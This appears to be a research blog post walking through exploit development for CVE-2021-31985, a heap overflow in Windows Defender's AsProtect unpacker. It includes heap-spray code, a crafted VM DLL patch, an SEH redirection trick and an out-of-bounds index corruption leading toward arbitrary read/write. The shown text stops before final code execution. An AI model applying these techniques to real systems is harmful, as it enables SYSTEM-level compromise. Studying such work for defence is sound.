CVE-2021-31985: Exploiting the Windows Defender AsProtect Heap Overflow Vulnerability



Overview

In the security updates of June 2021, Microsoft patched a heap buffer overflow in the Windows Defender mpengine.dll assigned as CVE-2021-31985. The vulnerability was found by Google Project Zero (GP0) and reported on May 25, 2021.

The Windows Defender Antivirus scans packed binaries by emulating them in its virtual machine, the Defender Emulator, and takes over the unpacking when certain signatures are detected. One of these is AsProtect. To execute AsProtect packer bytecode, it has to reconstruct an embedded VM DLL supplied by this "external" packed binary. A lack of sanitization of the section relative virtual addresses (RVAs) allows a memcpy-style heap overflow with controllable data, size and offset. These primitives could lead to remote code execution with NT AUTHORITY\SYSTEM privileges.

In this blog post, first we recap the root-cause analysis of this vulnerability from the original GP0 issue tracker[1]. Next we discuss how CVE-2021-31985 can be exploited based on the in-the-wild (ITW) sample of CVE-2021-1647. Finally we end this blog post with a parting remark on how a change in an object layout from mpengine.dll 1.1.18100 onwards breaks the exploitation technique used here.

The reader is assumed to be familiar with the Windows Defender Emulator internals. Otherwise this presentation[2] and tool[3] are excellent resources.

This exploit was developed on Windows Defender mpengine.dll 1.1.16400.2, a symbolized version default on Windows x64 20H2 (19042.508).



Vulnerability

From the original GP0 issue tracker[1], the vulnerable function is in CEmbededDLLDumper::GenerateDLL(). In this function, the embedded VM DLL is reconstructed from the first parameter CEmbededDLLDumper *dll_dumper, which is a pointer to section descriptors, header information and section raw streams to be copied. In a nutshell, the function executes the following sequence of actions:

  1. Allocates memory for the entire PE image
  2. Copies a fixed PE header embedded in mpengine.dll
  3. Initializes various fields in NtHdr->OptionalHeader
  4. Creates section header entries
  5. Copies section raw data to PE image
  6. Calls VirtualFileWrapper::Write() to dump this constructed VM DLL to Emulator Virtual-FileSystem (VFS)

The vulnerability exists because each section's RVA is used, without any bounds check, to compute the destination address inside the image buffer for the memcpy_s_0() call.

In [1], the last section RVA is set to 0x41414141 to trigger an immediate out-of-bounds write (OOBW). However, since the embedded VM DLL is user-supplied, the number of sections and the size, RVA and raw data of each section are all controllable. This gives us a nice write-what-where primitive for exploitation.
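To make the missing check concrete, here is a minimal sketch of what a bounds-checked section copy could look like. The helper name copy_section_checked() and its signature are hypothetical; this is not the code in mpengine.dll, nor a description of how Microsoft actually patched it.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper (not an mpengine.dll function): copies one section
 * into the image buffer only if [rva, rva + size) lies inside the image. */
static int copy_section_checked(uint8_t *image, size_t image_size,
                                uint32_t rva, const uint8_t *raw,
                                uint32_t size)
{
    /* Compare against the remaining space so the check cannot wrap. */
    if (rva > image_size || size > image_size - rva)
        return -1;                  /* would write outside the image */
    memcpy(image + rva, raw, size);
    return 0;
}
```

With a check of this kind, both the 0x41414141 RVA from [1] and any RVA that points just past the end of the image buffer would be rejected before the copy.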

Based on the attachments in [1], triggering the vulnerability is straightforward. File asprotect-v1.23RC1-unmodified-sample.bin is a benign binary packed by AsProtect-v1.23RC1. File asparse.c patches the RVA of last section in embedded VM DLL to 0x41414141. File asprotect-patched-segment-rva.bin triggers the vulnerability.

In asparse.c, the following lines are used to indicate the offset and size for embedded VM DLL:


static unsigned kEmbeddedDllSize = 0x11c1e;
static unsigned kEmbeddedDllOffset = 0x42ce9;
static unsigned kNewRva = 0x41414141;

At offset kEmbeddedDllOffset, the first 8 bytes are MD5-hashed to derive an RC4 key. The kEmbeddedDllSize bytes of raw data stream are then RC4-decrypted with this key. In the decrypted stream, the VM DLL information is located at offset 0x9401, immediately after the 4-byte signature AF B8 7A 2E. During emulation, this signature is computed at runtime to locate the start of the VM DLL. In short, starting from offset 0x9401 - 0x4 = 0x93FD, the embedded VM DLL looks like this:


AF B8 7A 2E                  // Signature for VM DLL
50 7C 00 00                  // Image Data Size 0x7C50
00 00 00 00 00 00 00 00      //
98 40 00 00                  // EntryPoint
00 00 40 00                  // Image Base 0x400000
00 D0 00 00                  // Image Virtual Size 0xD000
00 B0 00 00                  // .data section RVA
00 A0 00 00                  // .idata section RVA (IAT)

00 10 00 00                  // .text section RVA
00 34 00 00                  // .text section Virtual Size
FF 25 E4 A0 40 00 8B C0 ...  // .text section raw data

Following the AF B8 7A 2E signature are 0x20 bytes of DLL fields that CEmbededDLLDumper::DumpEmbededDLL() parses and checks. Then the function loops to process tuples of (sect_rva, sect_size, raw_data_stream) data for each section for 0x7C50 bytes of image data.
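The layout above can be read back with a few lines of C. The sketch below is only an illustration: the struct, its field names and the plain linear signature scan are our own assumptions (the Emulator computes the signature at runtime and locates it differently); only the offsets come from the dump above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Field names are illustrative; only the offsets come from the dump. */
struct vmdll_header {
    uint32_t data_size;    /* +0x00 image data size            */
    uint32_t entry_point;  /* +0x0C entry point                */
    uint32_t image_base;   /* +0x10 image base                 */
    uint32_t image_size;   /* +0x14 image virtual size         */
    uint32_t data_rva;     /* +0x18 .data section RVA          */
    uint32_t idata_rva;    /* +0x1C .idata section RVA (IAT)   */
    uint32_t sect0_rva;    /* +0x20 first section RVA          */
    uint32_t sect0_size;   /* +0x24 first section virtual size */
};

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns the offset just past the AF B8 7A 2E signature, or -1. */
static long find_vmdll(const uint8_t *buf, size_t len)
{
    static const uint8_t sig[4] = { 0xAF, 0xB8, 0x7A, 0x2E };
    for (size_t i = 0; i + sizeof sig <= len; i++)
        if (memcmp(buf + i, sig, sizeof sig) == 0)
            return (long)(i + sizeof sig);
    return -1;
}

/* Parses the 0x20 header bytes plus the first (rva, size) tuple. */
static int parse_vmdll(const uint8_t *buf, size_t len, struct vmdll_header *h)
{
    long off = find_vmdll(buf, len);
    if (off < 0 || len - (size_t)off < 0x28)
        return -1;
    const uint8_t *p = buf + off;
    h->data_size   = rd32le(p + 0x00);
    h->entry_point = rd32le(p + 0x0C);
    h->image_base  = rd32le(p + 0x10);
    h->image_size  = rd32le(p + 0x14);
    h->data_rva    = rd32le(p + 0x18);
    h->idata_rva   = rd32le(p + 0x1C);
    h->sect0_rva   = rd32le(p + 0x20);
    h->sect0_size  = rd32le(p + 0x24);
    return 0;
}
```

Run against the RC4-decrypted stream of the unmodified sample, such a parser should report the .text tuple (RVA 0x1000, size 0x3400) shown in the dump.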

Therefore, to minimize our POC code, we limit the number of sections to just the .text section, change all the related bytes (e.g. section RVA, section size, image size) and also modify the kNewRva variable.



Exploitation

The exploitation outline for CVE-2021-31985 is based on the technique used in CVE-2021-1647 because of their similarities. In our study of the CVE-2021-1647 ITW sample[4] (SampleITW_1647), the public analyses from ThreatBook[5] and GP0[6] provided important insights into how its exploitation works, in particular "primitive bootstrapping". The reader is strongly encouraged to read these. The key points are noted below:

  1. Use of NtControlChannel() to obtain mpengine.dll version.
  2. Use of SuspendThread() and ResumeThread() to perform heap spray and manipulate memory layout.
  3. Trigger heap overflow to overwrite an lfind_switch_payload object with hardcoded values 0x2F9B and 0x2F9C (aka OOBW1).
  4. Values 0x2F9B and 0x2F9C are later used as indices in lfind_switch::switch_in() to perform OR 0x3 operation to 2 bytes of a size field in the VMM_context_t structure. This changes the original 0xC value to 0x3030C (aka OOBW2). As this size field tracks virtually mapped pages in a table, this effectively allows us arbitrary R/W via the EmuVaddrNode index array.
  5. Use of emulated execution and Defender VM JIT for code execution.

During our course of development, we found and referenced another useful public sample of CVE-2021-1647 [7] (SamplePUB_1647). To shorten development time, we decided to reuse as much of its artefacts as possible.

The exploitation strategy is discussed below. In this section, POC.exe refers to our own build of CVE-2021-31985.

1. Preparation

The POC.exe will drop dump.exe (from SamplePUB_1647) to Emulator VFS, of which a stage-2 binary is already built into it. Therefore in this stage, we replace this original embedded binary with our custom stage2.exe by overwriting its size and content at offsets 0xA894 and 0xA8A0 respectively.

Next, as POC.exe will create multiple instances of dump.exe, a global event is also created for process synchronization.


#include "dump_exe.h"
#include "stage2.h"

int wmain() {
    HANDLE hEvent;
    SECURITY_ATTRIBUTES securityAttributes;
    // ...
    // replace stage2 embedded in dump.exe, max 0x10000 bytes
    *(DWORD*)&dump_exe[0xA894] = stage2_exe_len;
    memset(&dump_exe[0xA8A0], 0, 0x2064);
    for (i = 0; i < (int)stage2_exe_len; i ++)
        dump_exe[0xA8A0 + i] = stage2_exe[i] ^ 0xDE;
    drop_file(L"dump.exe", dump_exe, dump_exe_len);
    
    securityAttributes.nLength = 12;
    securityAttributes.lpSecurityDescriptor = 0;
    securityAttributes.bInheritHandle = 1;        // dump.exe inherits hEvent
    hEvent = CreateEventW(&securityAttributes, 0, 0, 0);
    // ...
}

2. Heap Spray

In this step, POC.exe will create 2 instances of dump.exe, with argument 1 and 3 respectively. These will in turn create more instances of dump.exe, with argument 2.1, 2.3 and 2.1. The aim of these instances is to each spray the memory with 250 lfind_switch objects and wait on the global event. Finally 25% of these objects are freed to create the 'holes' for the subsequent (step 6) arbitrary OOBW2.

The heap spray is done with a combination of CreateThread(), ResumeThread(), SuspendThread() and TerminateThread() function calls. The spray objects are allocated in lfind_switch::switch_out(), and reused in lfind_switch::switch_in(). The relevant functions are:


void NTDLL_DLL_NtCreateThreadWorker(struct pe_vars_t *pe_vars);
void NTDLL_DLL_NtResumeThreadWorker(struct pe_vars_t *pe_vars);
void NTDLL_DLL_NtSuspendThreadWorker(struct pe_vars_t *pe_vars);
void NTDLL_DLL_NtTerminateThreadWorker(struct pe_vars_t *pe_vars);

These functions are related to the lfind_switch class object through the following example call stack.


NTDLL_DLL_NtSuspendThreadWorker(struct pe_vars_t *a1)   // or ResumeThread()
-> adjustSuspensionThreadWorker(pe_vars, 1, -1)         // -1, 0 for ResumeThread()
   -> ThreadManager::performThreadSwitchToThread()
      -> pe_switch_CTX_ForThread()
         -> pe_switch_CTX_base()
            -> lfind_switch::switch_out()               // or ::switch_init() or ::switch_in()

The sprayed object, lfind_switch_payload, is pointed to by the lfind_switch object. We guess that this object is used to store (intermediate) states related to the context of the current thread.

In lfind_switch::init(), which is called by NtCreateThreadWorker(), we observed that the lfind_switch_payload object is allocated with 0x100 bytes. In SamplePUB_1647 and POC.exe, we use the following sequence to reallocate this spray object and increase its size from 0x100 bytes to 0x2000 bytes:


// POC.exe spray code, dump.exe has a similar sequence
for ( i = 0; i <= 249; ++i )         // CREATE_SUSPENDED = 4
    threadPool[i] = CreateThread(0, 0, SprayRoutine, 0, 4, &dwThreadId);
for ( i = 0; i <= 249; ++i )
    ResumeThread(threadPool[i]);     // Halt by the 1st SuspendThread()
for ( i = 0; i <= 249; ++i )
    ResumeThread(threadPool[i]);     // Halt by the 2nd SuspendThread()
for ( i = 0; i <= 249; ++i )
    ResumeThread(threadPool[i]);     // Halt by the 3rd SuspendThread()

The thread routine SprayRoutine() is defined as below:


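DWORD __stdcall SprayRoutine(LPVOID lpThreadParameter) {
    // Each self-suspend is undone by one ResumeThread() loop in the spray code
    SuspendThread(GetCurrentThread());
    SuspendThread(GetCurrentThread());
    SuspendThread(GetCurrentThread());
    return 0;    // reached only if the thread is resumed once more
}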

On the third SuspendThread(), lfind_switch::switch_out() will be called and subsequently the lfind_switch_payload object will be reallocated to 0x2000 bytes, presumably to store the thread state before the context switch. The repeated SuspendThread() calls are intentional, to force the storage of more intermediate states. Our reversing suggests this is related to BBinfo_LF::get_loop_info(). Removing or adding any number of SuspendThread() calls will change the reallocated object size.

3. Construction of AsProtect Trigger

Although the original asprotect-patched-segment-rva.bin triggers the AsProtect bug, it allocates a PE image buffer of 0xD000 bytes. To reuse the technique of CVE-2021-1647, we have to modify this blob so that it allocates a PE image buffer of 0x2000 bytes instead, the same size as the sprayed lfind_switch_payload objects. Therefore, we modify asparse.c into asparse2.c as follows:


    // asparse2.c: modifications to the original asparse.c
    // additions, at offsets right after sig_x 0x9401 in seg->buf
    static unsigned kOffsetSigX = 0x9401;	// offset after AF B8 7A 2E in RC4 stream
    
    static unsigned kNewDataSize = 0x1024;	// was 0x7c50, 0x3423 for .text, now reduced
    static unsigned kNewImgSize = 0x2000;	// was 0xd000 => lfind_switch_obj size
    static unsigned kNewSect0Size = 0x1000 - 0x10;	// was 0x3400 => memcpy_s OOBW1 size
    static unsigned kNewSect0RVA = 0x2000 + 0x10;	// was 0x1000 => OOBW1 offset
    static unsigned kNewSect4RVA = 0x0;		// was 0xb000 => to pass checks
    static unsigned kNewIAT_RVA = 0x0040;	// was 0xa000 => control content if needed
    static unsigned kNewEntPoint = 0x009C;	// was 0x4098 => in image, semi-controlled
    
    uint8_t sect0_buf[0x1000] = { 0 };
    
    int main(int argc, char **argv)
    {
        // ...
        uint16_t OOB_Idx2 = 0;
        // ...
        // The first 8 bytes need to be hashed to generate the RC4 key.
        // 01 00 00 00 26 1c 01 00 (size 0x011c26 - 8) untouched
        MD5(seg->key, sizeof seg->key, md);
        
        // ... after decrypting the RC4 encrypted embedded file ..
        
        // offsets: 0 DataSize, 0xC EntryPoint RVA, 0x14 ImgSize, 0x18 B000, 
        //          0x1C A000, 0x20 .sect0 RVA 1000, 0x24 .sect0 Size 3400 
        //memcpy(&seg->buf[0x10e49], &kNewRva, sizeof kNewRva);
        memcpy(&seg->buf[kOffsetSigX + 0], &kNewDataSize, sizeof kNewDataSize);
        memcpy(&seg->buf[kOffsetSigX + 0xC], &kNewEntPoint, sizeof kNewEntPoint);
        memcpy(&seg->buf[kOffsetSigX + 0x14], &kNewImgSize, sizeof kNewImgSize);
        memcpy(&seg->buf[kOffsetSigX + 0x18], &kNewSect4RVA, sizeof kNewSect4RVA);
        memcpy(&seg->buf[kOffsetSigX + 0x1C], &kNewIAT_RVA, sizeof kNewIAT_RVA);
        memcpy(&seg->buf[kOffsetSigX + 0x20], &kNewSect0RVA, sizeof kNewSect0RVA);
        memcpy(&seg->buf[kOffsetSigX + 0x24], &kNewSect0Size, sizeof kNewSect0Size);
    
        OOB_Idx2 = 0x2F9A;		// version > 15999
        memset(sect0_buf, '\xff', sizeof(sect0_buf) - 0x10);
        *(uint16_t *)&sect0_buf[0x10 + 0x30 - 0x10] = 8;
        *(uint16_t *)&sect0_buf[0x10 + 0x42 - 0x10] = 2;
        *(uint16_t *)&sect0_buf[0x10 + 0x58 - 0x10] = OOB_Idx2 + 1;		// 0x2f9b for 16000
        *(uint16_t *)&sect0_buf[0x10 + 0x5A - 0x10] = OOB_Idx2 + 2;		// 0x2f9c for 16000
        memcpy(&seg->buf[kOffsetSigX + 0x28], sect0_buf, sizeof(sect0_buf));
        
        // ... encrypting the modified embedded file ..
    }
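
The arithmetic behind the section-0 payload can be isolated in a small, endian-independent sketch. The helper names below are hypothetical and the buffer is sized to the 0xFF0 bytes actually copied by OOBW1; the offsets (0x30, 0x42, 0x58, 0x5A) and values are the ones used in asparse2.c.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SECT0_LEN 0x0FF0u   /* kNewSect0Size = 0x1000 - 0x10 */

static void wr16le(uint8_t *p, uint16_t v)
{
    p[0] = (uint8_t)(v & 0xFF);
    p[1] = (uint8_t)(v >> 8);
}

/* Fills the OOBW1 payload; size_field_idx plays the role of OOB_Idx2
 * in asparse2.c (0x2F9A for the builds discussed here). */
static void build_oobw1_payload(uint8_t buf[SECT0_LEN], uint16_t size_field_idx)
{
    memset(buf, 0xFF, SECT0_LEN);
    wr16le(buf + 0x30, 8);
    wr16le(buf + 0x42, 2);                  /* two indices follow */
    wr16le(buf + 0x58, (uint16_t)(size_field_idx + 1));
    wr16le(buf + 0x5A, (uint16_t)(size_field_idx + 2));
}

/* Distance from the end of the image buffer to the first byte written. */
static uint32_t oobw1_start_past_image(uint32_t image_size, uint32_t sect_rva)
{
    return sect_rva - image_size;
}
```

With kNewImgSize = 0x2000 and kNewSect0RVA = 0x2010, the copy starts 0x10 bytes past the end of the image buffer. We read that gap as room for the metadata of the adjacent heap chunk, which is an assumption on our part.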

Similar to SamplePUB_1647, we overwrite the 0x63000 bytes section (at offset 0x560000) of the above AsProtect packed binary with the crafted embedded VM DLL to trigger the bug, allocate the 0x2000 bytes image buffer, and set the overwritten data for OOBW1. We also identified basic-block (BBL) 0x5BF04D as the AsProtect signature BBL, similar to the corresponding BBL 0x426000 in SamplePUB_1647. As simple as this sounds, with no prior experience in Windows Defender, learning to debug this via traces from kvscanpage4sig() has been "fun" :) Anyway, the relevant breakpoints to reach the unpacked AsProtect signature BBL are shown below:


    0:000:x86> bu 402000; g					// go to entry point
    0:000:x86> bu 56025b; g					// go to the relevant decrypt loop
    Breakpoint 1 hit
    trigger+0x16025b:
    0056025b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
    
    0:000:x86> bc
    0:000:x86> ba r1 5bf04d; g			 	// the signature block is unpacked
    Breakpoint 1 hit
    trigger+0x16025b:
    0056025b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
    
    0:000:x86> bc; p						// finish the unpacking of sig BBL
    0:000:x86> bu 5bf04d; g					// break on hitting the sig BBL
    0:000:x86> g
    Breakpoint 1 hit
    trigger+0x1bf04d:
    005bf04d bb44294400      mov     ebx,offset trigger+0x42944 (00442944)
    0:000:x86> r
    eax=00000001 ebx=005aa650 ecx=bea80000 edx=00000000 esi=001c0000 edi=0058c000
    eip=005bf04d esp=007cff1c ebp=0017c6bc iopl=0         nv up ei pl nz ac po nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
    trigger+0x1bf04d:
    005bf04d bb44294400      mov     ebx,offset trigger+0x42944 (00442944)
    
    0:000:x86> dd esp						// important values on the stack
    007cff1c  0058c000 001c0000 005600ff 007cff3c
    007cff2c  005aa650 00000000 bea80000 00000001
    007cff3c  005aa650 0058c000 00000001 00000000
    007cff4c  00000000 00560517 00402000 00402000
    
    0:000:x86> u 5bf04d
    trigger+0x1bf04d:
    005bf04d bb44294400      mov     ebx,offset trigger+0x42944 (00442944)
    005bf052 03dd            add     ebx,ebp
    005bf054 2b9d71294400    sub     ebx,dword ptr trigger+0x42971 (00442971)[ebp]
    005bf05a 83bdd830440000  cmp     dword ptr trigger+0x430d8 (004430d8)[ebp],0
    005bf061 899d2f2e4400    mov     dword ptr trigger+0x42e2f (00442e2f)[ebp],ebx
    005bf067 0f853e050000    jne     trigger+0x1bf5ab (005bf5ab)
    005bf06d 8d85e0304400    lea     eax,trigger+0x430e0 (004430e0)[ebp]
    005bf073 50              push    eax

At this point, the RC4-encrypted VM DLL is already loaded in memory and the AsProtect signature BBL is unpacked and ready to be executed to unpack, decrypt and dump the VM DLL on VFS as discussed in the next section.

4. Execution of AsProtect Unpacking

As seen below, the function that triggers CVE-2021-31985 sits deeper in the call stack than the one for CVE-2021-1647.


AsProtect signature BBL trigger:
kvscanpage4sig(buf_426000 / buf_5bf04d) 
=> UnpackerContext::Unpack(Unpack *)
    => AsprotectIsMine()
        => CAsProtectDLLAndVersion::RetrieveVersionInfoAndCreateObjects() // CVE-2021-1647
    => CAsprotectUnpacker::Unpack(Unpacker)
        => CAsprotectUnpacker::ReBuild(CAsprotectV2Unpacker* Unpacker)
            => CAsprotectUnpacker::ReBuild_Basic(CAsprotectUnpacker* Unpacker)
                => CAsprotectUnpacker::GetEncryptedData(Unpacker)
                => CAsprotectUnpacker::InitAndDecryptSignatureData(Unpacker)
                => CAsprotectUnpacker::InitSignatures(Unpacker)
                    => CAsprotectV2Unpacker::GetFeaturedSignature(Unpacker)
                            => CAsprotectV2Unpacker::GetSignatureForSignatureTable(Unpacker)
                            => CAsprotectUnpacker::SearchSignature(Unpacker)
                            => CAsprotectV2Unpacker::BuildSignatureTable(Unpacker)
            => CAsprotectV2Unpacker::DumpEmbededDLL(Unpacker)
            => functions handling RebuiltIAT_OEP, Imports, ObfuscatedFunctions, etc
            => CAsprotectV2Unpacker::GenerateSimulator(Unpacker)
                => CEmbededDLLDumper::DumpEmbededDLL(), dumps VM DLL //CVE-2021-31985

This also means that triggering CVE-2021-31985 requires the unpacking execution to satisfy additional checks and constraints. Of particular interest is the 0x40 bytes of user-controlled content found at the top of the stack at AsprotectIsMine(). While we simply reuse this stack content from a normal execution without understanding its semantics, we did come across an Unpacker object that reads the DWORD 0x00560517 from the stack. This is actually an address that contains information to bootstrap locating the VM DLL stream and its section tables. For example, in ReBuild_Basic(), the callee ReadPackedFile() fetches the image base 0x400000 from 0x560517 and uses it to compute the VM DLL stream address.

Next, the (sub)call tree of CAsprotectUnpacker::InitSignatures() builds a signature table containing different signatures (in BuildSignatureTable()) among which signature sig_x = 0x2E7AB8AF will be used later.

Finally in CAsprotectV2Unpacker::DumpEmbededDLL(), the signature sig_x is used together with an index 0x8E to locate the section tables in the decrypted VM DLL stream, read the data stream size and instantiate the CEmbededDLLDumper *dll_dumper object to be passed as an argument to the vulnerable function CEmbededDLLDumper::GenerateDLL().

The full set of 0x40 bytes of stack values is shown below.


#include "sect_560.h"

unsigned char *save_ebp, *save_esp;
unsigned char *_sect_560000 = NULL;

DWORD stack_0x40[] = {
    0x058c000, 0x01c0000, 0x05600ff, 0x07cff3c,			// IAT 0x40 version
    0x05aa650, 0x0000000, 0xbea80000, 0x0000001,		// 0x9C version
    0x05aa650, 0x058c000, 0x0000001, 0x0000000,
    0x0000000, 0x0560517, 0x0402000, 0x0402000
};

int main() {
    // ...
    _sect_560000 = VirtualAlloc((LPVOID)0x560000, 0x63000, 0x3000, 0x40);
    if (_sect_560000 != (unsigned char*) 0x560000)
        return 0;
    memcpy(_sect_560000, _sect_560, _sect_560_len);
    memset(_sect_560000 + 0xa3c, 0, 0xc93 - 0xa3c);
    // ...
    __asm{
        push ecx
        sub esp, 0x40
        mov save_esp, esp
        mov save_ebp, ebp
    };
    memcpy(save_esp, stack_0x40, 0x40);
    __asm{
        mov ebp, 0x17c6bc
        mov esp, save_esp
        mov ecx, _sect_560000
        add ecx, 0x5f04d        // buf_trigger = _sect_560000 + 0x5f04d;
        jmp ecx					// ((void (*)(void))buf_trigger)();
        mov esp, save_esp
        mov ebp, save_ebp
        add esp, 0x40
        pop ecx
    };
}

5. Continuation of AsProtect Trigger

In the previous step, we successfully triggered the AsProtect signature BBL and transitioned from PE space to the vulnerable code in the native space function CEmbededDLLDumper::DumpEmbededDLL(). After the trigger is done, the other half of the problem is to get back to PE space so that POC.exe continues execution and finishes the rest of the steps. This depends on the following:

  1. After CEmbededDLLDumper::DumpEmbededDLL() completes OOBW1, it calls VirtualFileWrapper::Write() to dump the embedded VM DLL onto VFS, which causes the Emulator to start a scan of this dropped file. For the crafted VM DLL, this scan jeopardizes the synchronization of the dump.exe processes. We tried setting various Emulator options, including MpSetAttributes("pea_disable_dropper_rescan"), to disable the scan, but to no avail. Fortunately, we are able to avoid triggering the scan by not writing the VM DLL to VFS at all. This is possible because, after OOBW1, the Emulator calls GetImportDescSize() before VirtualFileWrapper::Write(). Since we control the VM DLL IAT section, we can cause GetImportDescSize() to fail, so that VirtualFileWrapper::Write() is not called, the VM DLL is not written to VFS, and the scan is not triggered.

  2. Redirect execution from the native mpengine.dll BBL back to PE space emulation of POC.exe by reusing the SEH trick from SamplePUB_1647 (i.e. deliberately cause a BBL emulation fault so that PE space emulation regains control). In the sample, an SEH mechanism is first set up. Then, immediately after the AsProtect signature BBL 0x426000, BBL 0x42655E triggers a call to MpSetAttributes("pea_uses_invalid_opcodes") and causes execution to continue in the (PE space) SEH handler. Similarly, after our AsProtect signature BBL 0x5BF04D, we call MpSetAttributes("pea_uses_access_violation") and MpSetAttributes("pea_dynmem_uses_access_violation").

To recap, we have now constructed a POC.exe that triggers AsProtect unpacking in the Emulator --> executes OOBW1 successfully --> deliberately avoids triggering the file scan --> finishes AsProtect signature BBL unpacking --> deliberately causes an access violation to continue execution in the custom SEH mechanism back in POC.exe. As in SamplePUB_1647, the custom SEH is set up with:

  1. iX_SaveCtx(): Saves 6 registers to a TargetFrame and installs the SEH handler to FS:[0].

  2. iX_LoadCtx(): Restores the context.

  3. iX_seh_handler(): Regains control and reports its mode by setting the return value in EAX when the context saved by iX_SaveCtx() is restored.


__declspec(naked) int iX_SaveCtx(TargetFrame *TF)
{
    __asm {
        pop edx			// ret
        pop eax			// TF
        mov [eax+0x0C], esi
        mov [eax+0x10], edi
        mov [eax+0x14], ebx
        mov [eax+0x18], edx	// TF[6] = ret
        mov [eax+0x1C], ebp
        mov [eax+0x20], esp

        mov ecx, fs:0		// setup SEH
        mov [eax], ecx
        mov fs:0, eax
        lea ecx, iX_seh_handler
        mov [eax+4], ecx
        push eax
        push eax
        
        call mark_target_frame
        add esp, 4
        pop eax
        mov edx, [eax+0x18]
        xor eax, eax
        jmp edx
    };
}

__declspec(naked) void iX_LoadCtx(TargetFrame *TF, DWORD ret)
{
    __asm {
        add esp, 4
        pop ebx
        pop eax
        mov esi, [ebx+0xC]
        mov edi, [ebx+0x10]
        mov ecx, [ebx+0x14]
        mov edx, [ebx+0x18]
        mov ebp, [ebx+0x1C]
        mov esp, [ebx+0x20]
        mov ebx, ecx
        jmp edx
    };
}

int iX_seh_handler(char *a1, TargetFrame *TF, char *a3, char *a4)
{
    DWORD dw_TF16;
    DWORD bit0_TF15 = TF->dw15 & 1;
    if (bit0_TF15 || TF->mark != 0xDEADBEEF)
        return 1;
    if (TF->dw15 & 2)
        dw_TF16 = TF->dw16;
    if (dw_TF16 >= 0) {
        if (!dw_TF16)
            return 1;
        RtlUnwind(TF, (PVOID)0x401103, 0, 0);	// to replace 0x40A516
        iX_LoadCtx(TF, 2);						// iX_SaveCtx() returns 2
    }
    return 0;
}

6. OOBW2

At this point, we have modified CVE-2021-31985 to have a similar "exploitation flow" to CVE-2021-1647, so we can now also reuse dump.exe for OOBW2.

As mentioned, a number of dump.exe instances are created for heap spraying. In particular, "dump.exe" 1 and "dump.exe" 3 are solely used to spray 250 lfind_switch_payload objects, as each emulator process is limited to 250 threads maximum. However "dump.exe" 2 has a different flow; it has two passes: in the 1st pass, it sprays 250 objects as well, but also creates 55 holes to prepare for the AsProtect trigger.


// "dump.exe" 2 creating holes in its first pass
for ( idx = 0; idx <= 217; idx += 4 )
{
    // pick these threads to resume so they terminate naturally
    ResumeThread_B1001075(*(HANDLE *)(4 * idx - 0x4EFD9260));
    *(_DWORD *)(4 * idx - 0x4EFD9260) = 0;    // Remove the freed threads
}
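
The hole count follows directly from the loop bounds. The sketch below models the thread table as a plain array of flags (our own simplification, with hypothetical names) and applies the same stride as the decompiled loop.

```c
#include <stddef.h>

#define SPRAY_THREADS 250   /* threads sprayed per emulated process  */
#define HOLE_LIMIT    217   /* last index examined by the first pass */
#define HOLE_STRIDE   4     /* every 4th thread is released          */

/* Clears every HOLE_STRIDE-th slot up to HOLE_LIMIT, mirroring the
 * decompiled loop, and returns the number of holes created. */
static size_t punch_holes(int live[SPRAY_THREADS])
{
    size_t holes = 0;
    for (size_t idx = 0; idx <= HOLE_LIMIT; idx += HOLE_STRIDE) {
        live[idx] = 0;
        holes++;
    }
    return holes;
}

/* Counts the threads whose spray object is still allocated. */
static size_t count_live(const int live[SPRAY_THREADS])
{
    size_t n = 0;
    for (size_t i = 0; i < SPRAY_THREADS; i++)
        n += (live[i] != 0);
    return n;
}
```

Indices 0, 4, ..., 216 give the 55 holes mentioned above, and each hole is followed by live objects, so a 0x2000 bytes image buffer that reclaims a hole is likely to sit right in front of a sprayed object.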

In the 2nd pass, OOBW1 will have already taken place. The lfind_switch_payload object following the hole reclaimed for the 0x2000 bytes image buffer in OOBW1 gets overwritten with crafted indices (0x2F9B and 0x2F9C) in the AsProtect trigger. The overwritten object belongs to the "dump.exe" 2 instance. Hence resuming its associated thread will cause lfind_switch::switch_in() to be called and the corrupted states (and indices) to be used.


// "dump.exe" 2 triggering OOBW2 in its second pass
for ( idx = 0; idx <= 249; ++idx )
{
    // this loop will clear the extra SuspendThread to call switch_in()
    if ( *(_DWORD *)(4 * idx - 0x4EFD9260) )
        ResumeThread_B1001075(*(HANDLE *)(4 * idx - 0x4EFD9260));
}

ResumeThread() then calls switch_in(), which uses the two indices to OR 0x03 into two bytes out of bounds, changing the DWORD from 0xC to 0x03030C. This value describes the number of entries in an index array EmuNodeIndex_list[] used for searching page table entries that map PE space addresses (x86) to native mpengine.dll addresses (x64). Modifying it to the large value 0x03030C therefore enables further manipulation of the page tables, leading to OOBW3.


char lfind_switch::switch_in(lfind_switch *lfind_switch_obj, struct BBinfo_LF *pBBinfo_LF)
{
    lfind_switch_payload = *(_QWORD *)lfind_switch_obj;
    // ...
    // restore thread "context" from lfind_switch_payload, use 0x0008
    *((_WORD *)pBBinfo_LF + 0x172) = *(_WORD *)(lfind_switch_payload + 0x30);
    // to copy 0x0002 * 2 = 0x0004 bytes for the two indices
    v15 = 2 * *(unsigned __int16 *)(lfind_switch_payload + 0x42);
    if (v15) {
        memcpy_s_0(
            **((void *const **)pBBinfo_LF + 0x5D),  // dst for copied indices
            v15,                                    // copy 4 bytes
            // src for indices: 9b 2f 9c 2f
            (const void *const)(v12 + *(_QWORD *)lfind_switch_obj + 0x48i64),
            v15);
        for ( indices_base = *((_QWORD *)pBBinfo_LF + 0x14);
            (unsigned int)i_1 < *(_DWORD *)(bb_obj_5D + 0x78);
            *(_BYTE *)(idx_A + *(_QWORD *)(bb_obj_5D + 0x90)) |= 3u )// OOBW2
        {
            i_2 = (unsigned int)i_1;
            i_1 = (unsigned int)(i_1 + 1);
            // fetch from the indices array (copied previously above)
            idx_A = *(unsigned __int16 *)(*(_QWORD *)bb_obj_5D + 2 * i_2);
            *(_WORD *)(indices_base + 2 * idx_A) |= 0x100u;
        }
    }
}

